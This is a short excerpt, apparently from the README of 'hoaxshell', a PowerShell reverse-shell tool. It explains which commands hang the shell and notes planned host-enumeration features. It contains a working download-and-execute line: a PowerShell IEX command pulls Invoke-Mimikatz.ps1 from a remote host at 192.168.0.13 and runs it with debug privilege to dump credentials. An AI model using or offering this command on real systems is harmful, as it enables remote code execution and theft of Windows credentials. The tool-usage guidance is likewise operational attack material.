# In the same manner, you won't have a problem executing this:
> cmd /c dir /a

# But this will cause your hoaxshell to hang:
> cmd.exe

So, if you for example would like to run mimikatz throught hoaxshell you would need to invoke the commands:

hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell powershell context.

Future

I am currently working on some auxiliary-type prompt commands to automate parts of host enumeration.